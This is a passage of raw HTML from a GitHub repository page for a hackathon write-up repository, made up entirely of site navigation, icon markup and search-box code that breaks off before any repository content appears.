env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-01764c79fa41.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/keyboard-shortcuts-dialog-48a8478d8ac2.js"></script> <react-partial partial-name="keyboard-shortcuts-dialog" data-ssr="false"> <script type="application/json" data-target="react-partial.embeddedData">{"props":{}}</script> <div data-target="react-partial.reactRoot"></div></react-partial> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-99519581d0f8.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-694c8423e347.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner" data-color-mode=light data-light-theme=light data-dark-theme=dark> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class=" d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign in </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <div class="px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M23.922 16.992c-.861 1.495-5.859 5.023-11.922 5.023-6.063 0-11.061-3.528-11.922-5.023A.641.641 0 0 1 0 16.736v-2.869a.841.841 0 0 1 .053-.22c.372-.935 1.347-2.292 2.605-2.656.167-.429.414-1.055.644-1.517a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.499 1.132-3.368.397-.406.89-.717 1.474-.952 1.399-1.136 3.392-2.093 6.122-2.093 2.731 0 4.767.957 6.166 2.093.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086.23.462.477 1.088.644 1.517 1.258.364 2.233 1.721 2.605 2.656a.832.832 0 0 1 .053.22v2.869a.641.641 0 0 1-.078.256ZM12.172 11h-.344a4.323 4.323 0 0 1-.355.508C10.703 12.455 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a2.005 2.005 0 0 1-.085-.104L4 11.741v6.585c1.435.779 4.514 2.179 8 2.179 3.486 0 6.565-1.4 8-2.179v-6.585l-.098-.104s-.033.045-.085.104c-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.545-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.016.016Zm.641-2.935c.136 1.057.403 1.913.878 2.497.442.544 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.15.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.319-.862-2.824-1.025-1.487-.161-2.192.138-2.533.529-.269.307-.437.808-.438 1.578v.021c0 .265.021.562.063.893Zm-1.626 0c.042-.331.063-.628.063-.894v-.02c-.001-.77-.169-1.271-.438-1.578-.341-.391-1.046-.69-2.533-.529-1.505.163-2.347.537-2.824 1.025-.462.472-.705 1.179-.705 2.319 0 1.211.175 1.926.558 2.361.365.414 1.084.751 2.657.751 1.21 0 1.902-.394 2.344-.938.475-.584.742-1.44.878-2.497Z"></path><path d="M14.5 14.25a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Zm-5 0a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> </div> <div class="px-lg-4"> <span>Explore</span> All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div class="border-bottom pb-3 mb-3"> <span>For</span> Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <div class="border-bottom pb-3 mb-3"> <span>By Solution</span> CI/CD & Automation DevOps DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <div class=""> <span>Resources</span> Learning Pathways <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> White papers, Ebooks, Webinars <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Customer Stories Partners <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div class="border-bottom pb-3 mb-3"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> </div> <div class="border-bottom pb-3 mb-3"> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> </div> <div class=""> <span>Repositories</span> Topics Trending Collections </div> </div> Pricing </nav> <div class="d-lg-flex flex-items-center mb-3 mb-lg-0 text-center text-lg-left ml-3" style=""> <qbsearch-input class="search-input" data-scope="repo:raouf-005/Hackfest-2k24-writeup" data-custom-scopes-path="/search/custom_scopes" data-delete-custom-scopes-csrf="6C7yQ7VmbPUfD-3WyH-eDC3TfgEg2NG2GnX0RzECeYEjEyQaO3kLH34Qs7FGYTkSHuZTeIrpH4Xi4eKkpy0zJg" data-max-custom-scopes="10" data-header-redesign-enabled="false" data-initial-value="" data-blackbird-suggestions-path="/search/suggestions" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" data-current-repository="raouf-005/Hackfest-2k24-writeup" data-current-org="" data-current-owner="raouf-005" data-logged-in="false" data-copilot-chat-enabled="false" data-blackbird-indexed-repo-csrf="<esi:include src="/_esi/rails_csrf_token_form_hidden?r=sHElInmSBtmmgMmnxNN865bckhagSdgPSvU17sapVb5IqBHkGulCCPHeJEmsEC847y6ooSH90Ki4zJ6M8H%2BWtz%2F6zps29LBn0uZDBvSN03FtDG%2BI1%2FGvWIa7k26hVh8%2Bb1cFgnf%2BMk8N9PAujsZlrnm4uBE4qp%2B9xwmZRV5vzgEuGO6BD9eFC7l2ZnSeh0Vhuv6fvslMo%2Fm2ZNbEZpZQ%2Frp0gXUB1jSovNeBnacj2PNkSRKt1SKU9F13C%2FNEJ0QCX8cLfuDbtSEOf%2F%2FghG%2BEkYspHAX7hXcRJvvhn5AmwC%2FBUfn4An1dnENz%2BWBB1sEnTh9PrTJkUTLhtmnPqLtlVjNNqEvGJ2l3gAaGDc3O%2BBI929V6xW6Fv86%2ByqSulrwCYCO4t4v2RFSlJHlsremif1jUOBIM44NHQ%2BIMWJnw7zRCB2PxhtIZG2eiLCMxYa6BooYvmapUzsK109kwZeOIMheQ%2BtXaPdJ6Ba9zeB7WuYoyw3fGS1sJ0gDSs6cKnzmE6st%2BLlKOa%2BIa%2FAyudnyUD6kjCYZqUReogHAfuAjHHANKj%2Bny6uD1TjRaUP2r4iT07ZvtmPJ0XWoBdQ%3D%3D--sL0OQkUPsGxDEQkO--GHOyFGYRbKXgpJM1t0UzGQ%3D%3D" />"> <div class="search-input-container search-with-dialog position-relative d-flex flex-row flex-items-center mr-4 rounded" data-action="click:qbsearch-input#searchInputContainerClicked" > <button type="button" class="header-search-button placeholder input-button form-control d-flex flex-1 flex-self-stretch flex-items-center no-wrap width-full py-0 pl-2 pr-0 text-left border-0 box-shadow-none" data-target="qbsearch-input.inputButton" placeholder="Search or jump to..." data-hotkey=s,/ autocapitalize="off" data-action="click:qbsearch-input#handleExpand" > <div class="mr-2 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <span>Search or jump to...</span> <div class="d-flex" data-target="qbsearch-input.hotkeyIndicator"> <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> </div> </button> <input type="hidden" name="type" class="js-site-search-type-field"> <div class="Overlay--hidden " data-modal-dialog-overlay> <modal-dialog data-action="close:qbsearch-input#handleClose cancel:qbsearch-input#handleClose" data-target="qbsearch-input.searchSuggestionsDialog" role="dialog" id="search-suggestions-dialog" aria-modal="true" aria-labelledby="search-suggestions-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto"> <h1 id="search-suggestions-dialog-header" class="sr-only">Search code, repositories, users, issues, pull requests...</h1> <div class="Overlay-body Overlay-body--paddingNone"> <div data-view-component="true"> <div class="search-suggestions position-fixed width-full color-shadow-large border color-fg-default color-bg-default overflow-hidden d-flex flex-column query-builder-container" style="border-radius: 12px;" data-target="qbsearch-input.queryBuilderContainer" hidden > </option></form><form id="query-builder-test-form" action="" accept-charset="UTF-8" method="get"> <query-builder data-target="qbsearch-input.queryBuilder" id="query-builder-query-builder-test" data-filter-key=":" data-view-component="true" class="QueryBuilder search-query-builder"> <div class="FormControl FormControl--fullWidth"> <label id="query-builder-test-label" for="query-builder-test" class="FormControl-label sr-only"> Search </label> <div class="QueryBuilder-StyledInput width-fit " data-target="query-builder.styledInput" > <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search FormControl-input-leadingVisual"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </span> <div data-target="query-builder.styledInputContainer" class="QueryBuilder-StyledInputContainer"> <div aria-hidden="true" class="QueryBuilder-StyledInputContent" data-target="query-builder.styledInputContent" ></div> <div class="QueryBuilder-InputWrapper"> <div aria-hidden="true" class="QueryBuilder-Sizer" data-target="query-builder.sizer"></div> <input id="query-builder-test" name="query-builder-test" value="" autocomplete="off" type="text" role="combobox" spellcheck="false" aria-expanded="false" aria-describedby="validation-c1593c24-3c0a-44be-8e39-d17b6abbacc5" data-target="query-builder.input" data-action=" input:query-builder#inputChange blur:query-builder#inputBlur keydown:query-builder#inputKeydown focus:query-builder#inputFocus " data-view-component="true" class="FormControl-input QueryBuilder-Input FormControl-medium" /> </div> </div> <span>Clear</span> <button role="button" id="query-builder-test-clear-button" aria-labelledby="query-builder-test-clear query-builder-test-label" data-target="query-builder.clearButton" data-action=" click:query-builder#clear focus:query-builder#clearButtonFocus blur:query-builder#clearButtonBlur " variant="small" hidden="hidden" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium mr-1 px-2 py-0 d-flex flex-items-center rounded-1 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x-circle-fill Button-visual"> <path d="M2.343 13.657A8 8 0 1 1 13.658 2.343 8 8 0 0 1 2.343 13.657ZM6.03 4.97a.751.751 0 0 0-1.042.018.751.751 0 0 0-.018 1.042L6.94 8 4.97 9.97a.749.749 0 0 0 .326 1.275.749.749 0 0 0 .734-.215L8 9.06l1.97 1.97a.749.749 0 0 0 1.275-.326.749.749 0 0 0-.215-.734L9.06 8l1.97-1.97a.749.749 0 0 0-.326-1.275.749.749 0 0 0-.734.215L8 6.94Z"></path></svg></button> </div> <template id="search-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg></template> <template id="code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" 